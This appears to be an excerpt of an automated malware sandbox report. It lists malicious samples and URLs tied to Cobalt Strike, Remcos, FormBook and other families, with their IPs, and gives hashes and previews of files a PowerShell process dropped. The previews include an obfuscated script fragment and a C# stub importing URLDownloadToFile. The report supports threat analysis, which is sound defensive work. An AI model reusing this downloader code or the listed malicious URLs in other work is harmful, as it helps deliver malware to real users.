                                                                                                        NB PO-104105107108.xlsGet hashmaliciousUnknownBrowse
                                                                                                        • 151.101.193.137
                                                                                                        greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                        • 151.101.1.137
                                                                                                        goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                                        • 151.101.1.137
                                                                                                        creamkissingthingswithcreambananapackagecreamy.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                        • 151.101.1.137
                                                                                                        Cot90012ARCACONTAL.xlsGet hashmaliciousRemcosBrowse
                                                                                                        • 151.101.129.137
                                                                                                        Euro confirmation Sp.xlsGet hashmaliciousUnknownBrowse
                                                                                                        • 151.101.1.137
                                                                                                        stage2.ps1Get hashmaliciousPureLog Stealer, RevengeRAT, zgRATBrowse
                                                                                                        • 151.101.193.137
                                                                                                        nicegirlforyou.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                        • 151.101.1.137
                                                                                                        paste.eecreatedbetterthingswithgreatnressgivenmebackwithnice.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                                        • 104.21.84.67
                                                                                                        givenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                        • 104.21.84.67
                                                                                                        clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                        • 172.67.187.200
                                                                                                        PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                                                                        • 104.21.84.67
                                                                                                        NB PO-104105107108.xlsGet hashmaliciousUnknownBrowse
                                                                                                        • 188.114.96.6
                                                                                                        greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                        • 104.21.84.67
                                                                                                        goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                                        • 172.67.187.200
                                                                                                        creamkissingthingswithcreambananapackagecreamy.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                        • 104.21.84.67
                                                                                                        Cot90012ARCACONTAL.xlsGet hashmaliciousRemcosBrowse
                                                                                                        • 188.114.97.6
                                                                                                        SOA USD67,353.35.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                        • 188.114.97.6
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        FASTLYUScreatedbetterthingswithgreatnressgivenmebackwithnice.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                                        • 151.101.1.137
                                                                                                        ORDER-24171200967.XLS..jsGet hashmaliciousWSHRat, Caesium Obfuscator, STRRATBrowse
                                                                                                        • 199.232.196.209
                                                                                                        https://ivsmn.kidsavancados.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 151.101.131.6
                                                                                                        https://uvcr.ovactanag.ru/jQXv/Get hashmaliciousUnknownBrowse
                                                                                                        • 151.101.130.137
                                                                                                        https://dot.itsecuritymessages.com/45sf4657dvz4hn/afc6c7/00179cbf-581d-4c00-98d3-bf1104b204adGet hashmaliciousUnknownBrowse
                                                                                                        • 151.101.2.109
                                                                                                        https://link.mail.beehiiv.com/ls/click?upn=u001.8ULyQR0JYqJFmtAcEKOwZJrtx6Pg-2FFIdL75Xr8cQplPy1BwMP6K04UCj8Y6BqsqIO5QCbkskm97LegF2duW8h-2B7y0wF2E-2BDZNcbzCPIVszT1GD6EOVy0YRZV55MI3rlD0kPZAiaJ0IK1-2FMU2lgPk2Kii32mX86fkDuIDK9GPx4-2FfuyI6JAqdMrtQqIbvs2W-2FN4SKHyAe889o909j2BgEQTYHmZASxysFG5X1abiH-2Bc9UXRQ1Ein-2BS-2BlY0g6W3s6a-2Bg8fspAfccvSCNZ8UZez1w-3D-3DUR2i_K8Qrv2qBC50DA374Af0scmFKIlSM-2Bv5ewezTCdQ-2FHdeUjmHtY3NrJD1TBTC8B4zB5HyIT-2F4sQexLT4eDcDNpHTw1Uv6zyerCF2l6Qv2QnUXIFi1vgFIVZbyXm-2Fb4OHwN5YbpoyTJNqIBeZHgSrlo7M6ZizbyF9nigOzGQDcMUgYHM7Aiblgmi6ZZqeS-2F4eQTcSMrquYcXkgDnpAgjrAXvqys7q9tGDujdSY7rWu7e2v-2B8ZqylkvKbnTnsoe7xpWX2CCdK7-2Ffs69cITr47FLMcG63ztEATsgzr65zgaz1vTU66UCHiyx70Gk8JDD2YjXZuzQvmiRgDA-2FXjbWgjk3i1v2Ulq6y1yKgmK1yrN5XfmHVDLnIEf-2BjigPUThjsOSZZpY0Q2K61IDWrFAR0MbUNzwiY-2FVg-2BeuZ5GmE7khj3oFCj0ivt137LdIBat61ZEFDpGet hashmaliciousUnknownBrowse
                                                                                                        • 151.101.194.137
                                                                                                        https://afg.acemlnb.com/lt.php?x=3TZy~GE3UnGZEpJA-w9HgOSc2K2ji_L0wu1gjqXGIXSh587-zEy.zuJr1Y2iitE~judAXHPHJeTMHaWtOdxFVOFx23MoiNDGet hashmaliciousUnknownBrowse
                                                                                                        • 151.101.129.140
                                                                                                        https://nq.trikeunpured.com/iSH5pdvbnvr/kmgeLGet hashmaliciousUnknownBrowse
                                                                                                        • 151.101.129.74
                                                                                                        Tbconsulting Company Guidelines Employee Handbook.docxGet hashmaliciousUnknownBrowse
                                                                                                        • 151.101.120.157
                                                                                                        FINAL000035745873695487KHFKA.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 151.101.194.137
                                                                                                        WOWUSsweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                        • 192.169.69.26
                                                                                                        1734388385543fca13ccf5614dc71c1922a5cd8cddeb80fc9e4bce55f618d2232c3744cd06117.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                        • 192.169.69.26
                                                                                                        x295IO8kqM.exeGet hashmaliciousRemcosBrowse
                                                                                                        • 192.169.69.26
                                                                                                        zvXPSu3dK5.exeGet hashmaliciousAsyncRATBrowse
                                                                                                        • 192.169.69.26
                                                                                                        173398584769f9c5bcf28a71f77fba1335e77fe6b4cc4f05afc05fdd9f5830429be0bc9fb5758.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                        • 192.169.69.26
                                                                                                        nicegirlforyou.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                        • 192.169.69.26
                                                                                                        1733858044e64c59622ab494dda2ff98fce76991f7e15e513d6a3620e7f58ad7cc67d3889c571.dat-decoded.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                        • 192.169.69.26
                                                                                                        f5ATZ1i5CU.exeGet hashmaliciousRedLine, XWormBrowse
                                                                                                        • 192.169.69.26
                                                                                                        P0J8k3LhVV.exeGet hashmaliciousNanocoreBrowse
                                                                                                        • 192.169.69.26
                                                                                                        173349055645d097cf36f6a7cc8cd8874001209539b453cb16f6acd61c0d845ab62e19e89d339.dat-decoded.exeGet hashmaliciousAsyncRATBrowse
                                                                                                        • 192.169.69.26
                                                                                                        ONEANDONE-ASBrauerstrasse48DEBG75-10-01_CurrencyTransfer__530_24_00002559_Processed.xlsGet hashmaliciousUnknownBrowse
                                                                                                        • 74.208.80.248
                                                                                                        BG75-10-01_CurrencyTransfer__530_24_00002559_Processed.xlsGet hashmaliciousUnknownBrowse
                                                                                                        • 74.208.80.248
                                                                                                        BG75-10-01_CurrencyTransfer__530_24_00002559_Processed.xlsGet hashmaliciousUnknownBrowse
                                                                                                        • 74.208.80.248
                                                                                                        profroma invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 74.208.236.156
                                                                                                        ORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 77.68.64.45
                                                                                                        SC_TR11670000_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 217.160.0.60
                                                                                                        loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 217.76.147.12
                                                                                                        jew.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 87.106.218.105
                                                                                                        RFQ_P.O.1212024.scrGet hashmaliciousFormBookBrowse
                                                                                                        • 217.160.0.200
                                                                                                        01152-11-12-24.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 217.160.0.113
                                                                                                        CLOUDFLARENETUScreatedbetterthingswithgreatnressgivenmebackwithnice.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                                        • 104.21.84.67
                                                                                                        ppc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                        • 172.65.156.157
                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                        • 104.21.2.110
                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                        • 172.67.129.27
                                                                                                        PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                        • 188.114.97.3
                                                                                                        https://tinyurl.com/5faazntxGet hashmaliciousUnknownBrowse
                                                                                                        • 104.18.111.161
                                                                                                        https://solve.jenj.org/awjxs.captcha?u=001e7d38-a1fc-47e3-ac88-6df0872bfe2dGet hashmaliciousUnknownBrowse
                                                                                                        • 104.21.16.207
                                                                                                        gkcQYEdJSO.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                        • 104.21.38.84
                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LiteHTTP Bot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                        • 104.21.2.110
                                                                                                        https://ivsmn.kidsavancados.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 104.18.94.41
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        3b5074b1b5d032e5620f69f9f700ff0esweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                        • 104.21.84.67
                                                                                                        • 151.101.1.137
                                                                                                        createdbetterthingswithgreatnressgivenmebackwithnice.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                                        • 104.21.84.67
                                                                                                        • 151.101.1.137
                                                                                                        PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                        • 104.21.84.67
                                                                                                        • 151.101.1.137
                                                                                                        drivers.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 104.21.84.67
                                                                                                        • 151.101.1.137
                                                                                                        GameBoxMini.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 104.21.84.67
                                                                                                        • 151.101.1.137
                                                                                                        drivers.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 104.21.84.67
                                                                                                        • 151.101.1.137
                                                                                                        Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 104.21.84.67
                                                                                                        • 151.101.1.137
                                                                                                        https://docsend.com/v/ty7vw/up-dateGet hashmaliciousUnknownBrowse
                                                                                                        • 104.21.84.67
                                                                                                        • 151.101.1.137
                                                                                                        3gJQoqWpxb.batGet hashmaliciousUnknownBrowse
                                                                                                        • 104.21.84.67
                                                                                                        • 151.101.1.137
                                                                                                        uZgbejeJkT.batGet hashmaliciousUnknownBrowse
                                                                                                        • 104.21.84.67
                                                                                                        • 151.101.1.137
                                                                                                        No context
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (3281), with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):154104
                                                                                                        Entropy (8bit):3.8082312070089706
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3072:qPN5KVAyQa3DsbfgpYcPN5KVAyQa3DsbfgpYNPN5KVAyQa3DsbfgpYf:25YYgpj5YYgpY5YYgpm
                                                                                                        MD5:80C468CCCBC1D6AA31D066F64CE06B42
                                                                                                        SHA1:6276DA318E9EC1756DDA7D7C9E9B2C5F00D3FDA4
                                                                                                        SHA-256:79A186BD409CAF82E85361C6885FD71EE00BEA6968D85CB8C9B71535909FE411
                                                                                                        SHA-512:37FD56E6121926E15433636AFE449F7002DE7A5BE35C18F8855D2E24C3542EABD7533B2DDB363E49972DDCA03F3EDB5868BB944AC799FF2FCF245D6271BF6662
                                                                                                        Malicious:false
                                                                                                        Preview:...... . . . .....Z.L.G.N.h.N.l.g.K.p.i.h.R.b.o. .=. .".c.A.m.c.G.f.q.k.h.U.J.J.u.d.t.".....L.K.G.L.h.k.K.L.G.h.L.f.i.i.j. .=. .".i.L.C.m.p.Z.Z.m.p.Q.u.K.g.P.e.".....c.I.L.B.K.c.m.J.K.e.d.Z.k.d.U. .=. .".K.N.W.G.f.W.c.m.t.Z.k.n.f.i.L.".........G.i.l.P.Z.c.e.b.b.z.l.P.K.h.f. .=. .".R.z.h.K.O.h.P.j.S.G.W.i.c.c.W.".....c.N.m.d.x.l.e.W.f.p.L.h.G.O.p. .=. .".s.A.W.G.L.m.z.A.L.m.z.W.m.A.p.".....o.K.N.n.l.G.H.d.B.x.n.q.A.l.C. .=. .".x.j.A.z.K.j.i.G.Z.K.b.p.j.q.c.".....A.t.N.R.c.h.m.c.n.J.H.G.z.i.c. .=. .".L.h.c.Z.p.J.K.x.B.W.c.A.c.B.r.".....c.k.L.m.K.a.p.t.A.c.Z.h.p.G.W. .=. .".e.b.k.K.W.m.A.G.t.W.O.A.P.L.L.".....i.C.L.A.W.W.W.P.R.G.T.G.c.U.i. .=. .".i.W.m.W.d.a.U.P.f.K.K.x.a.c.N.".....L.o.I.p.p.q.k.h.L.J.f.h.C.i.L. .=. .".U.N.L.d.W.J.N.r.s.L.k.A.R.m.g.".....h.G.N.a.W.C.m.U.L.i.L.W.N.L.Q. .=. .".k.e.e.e.L.m.L.W.L.z.o.b.G.A.U.".....U.z.i.h.c.z.Z.W.e.I.N.i.W.l.P. .=. .".C.U.d.i.p.W.L.k.v.c.R.W.a.k.g.".....K.P.L.b.P.o.O.N.T.o.C.K.p.K.W. .=. .".s.f.n.k.H.b.G.R.m.k.K.O.f.G.H.".....L.l.g.W.P.B.k.L.
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):5829
                                                                                                        Entropy (8bit):4.901113710259376
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                                                                                        MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                                                                                        SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                                                                                        SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                                                                                        SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                                                                                        Malicious:false
                                                                                                        Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1144
                                                                                                        Entropy (8bit):5.290848674040258
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:32gSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NKM9r8Hd:GgSU4y4RQmFoUeWmfmZ9tK8NF9u
                                                                                                        MD5:374272AB01A3AD6B586FC209D47F884D
                                                                                                        SHA1:8C785EB3C085C24C140A197D553DE29B3AF5628A
                                                                                                        SHA-256:FEEC1C388B6D48779BD53FDC17D19CCFBABF759B59C84DAC3DA1B6D3D1376981
                                                                                                        SHA-512:4266E69AA211B66EC5E5BF649C75D9D136B735B41FDEC089EA61919DC3E93A2FC7A4B274A313234AE813F0DA7DA16EB3236039C77A7A66DC00AFFE26990790B3
                                                                                                        Malicious:false
                                                                                                        Preview:@...e...........................................................@...............(..o...B.Rb&............Microsoft.VisualBasic...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...
                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols, created Tue Dec 17 07:25:12 2024, 1st section name ".debug$S"
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1340
                                                                                                        Entropy (8bit):3.979239787661473
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:HTK9oca5qiUaHOwKcjmfwI+ycuZhNCakSKPNnqSed:zZfxNK2mo1ulCa3mqS+
                                                                                                        MD5:839563DDADA6B424E6C4D390254AEBE0
                                                                                                        SHA1:6E296545B710B796958FA54EBC057EC2D3309D9E
                                                                                                        SHA-256:CD7486159B98A0E288BF2E1D634C1D42C10C5E1AA94544DF55C0051BDD7D285E
                                                                                                        SHA-512:0983C635AC5D11CA8B8363E911E94243AC3FED9F4AD239ACCE5A69A06C6629E59E310AB5E49C3CEFF1FEA41A883EEC9C10CB3AB6CD3002E727F9990C6A7A2A47
                                                                                                        Malicious:false
                                                                                                        Preview:L...X'ag.............debug$S........X...................@..B.rsrc$01........X.......<...........@..@.rsrc$02........P...F...............@..@........V....c:\Users\user\AppData\Local\Temp\bxb5o0my\CSC331954E1B244EC883461F7D54BF3FA4.TMP..................K...:/...5.>a7..........7.......C:\Users\user\AppData\Local\Temp\RES207F.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.x.b.5.o.0.m.y...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                        File Type:MSVC .res
                                                                                                        Category:dropped
                                                                                                        Size (bytes):652
                                                                                                        Entropy (8bit):3.0968018120019516
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grygJak7YnqqT+PN5Dlq5J:+RI+ycuZhNCakSKPNnqX
                                                                                                        MD5:B24BC111C83A2FEB04DEA135993E6137
                                                                                                        SHA1:393B84877FAD578D7BC119009F4041E40335D511
                                                                                                        SHA-256:7EA41F0780A8AB91EB455B283A54F624020BBC6226A3B8F3AEC56FC2AE133956
                                                                                                        SHA-512:7D8EEC39B6D14943B10C4117EF05EADD04B3F717A73D12F2CD4565D8D2BC37734B69BE64BDC32FDAD6FBE5BE49BA0AC8377900F379FFBB8A9AB1530F7A4E6DCB
                                                                                                        Malicious:false
                                                                                                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.x.b.5.o.0.m.y...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...b.x.b.5.o.0.m.y...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (371)
                                                                                                        Category:dropped
                                                                                                        Size (bytes):485
                                                                                                        Entropy (8bit):3.8046840691915524
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:V/DsYLDS81zufU+PM6JQXReKJ8SRHy4HBa741R6mJM37ziM4vwy:V/DTLDfumXfHsuzMr2Pvwy
                                                                                                        MD5:C0AB7D9C1B9063DC8A229D9074412EC6
                                                                                                        SHA1:4822B8B99901C563E7B2EB0399AAB1ADA29809D1
                                                                                                        SHA-256:05DA06F5D5AFBB950C215D14A1AE166C256466F43298BF300DDFFE6CF87D6EF6
                                                                                                        SHA-512:3D09208B03CBBCA2F036D4C7CAF06990AF60C40FD3727F59489C454E7D8D02A6F0ED1448040F224A093695DD143836044D5AFDD8543C921A2F543246DA57B4BF
                                                                                                        Malicious:false
                                                                                                        Preview:.using System;.using System.Runtime.InteropServices;..namespace lxyDl.{. public class zMBim. {. [DllImport("uRlmoN", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr DqtOAvHz,string wYFEVuZIp,string G,uint HgyMZmZV,IntPtr hqfJoYdlGn);.. }..}.
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (372), with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):375
                                                                                                        Entropy (8bit):5.218203078705514
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fdKzxs7+AEszIN723fd9x:p37Lvkmb6K2acWZETa5
                                                                                                        MD5:30DD8F209D973E05752D4739B6981950
                                                                                                        SHA1:8F888768668E7E7E89FF0127EAABC57EAD2946E9
                                                                                                        SHA-256:DDBD991095BEC1FE84024ED5D243DD0A7D5A5ADF1548D531739EFB38AD240636
                                                                                                        SHA-512:38C67ACFD43CFDC53C7030CCAAA1879C8A93121E205AC8F29882593D5A5B0BEF4BCF41FC0DCB42CE0E5BD02B2F3C0823B2793079043B97BDC7185F35BB577475
                                                                                                        Malicious:true
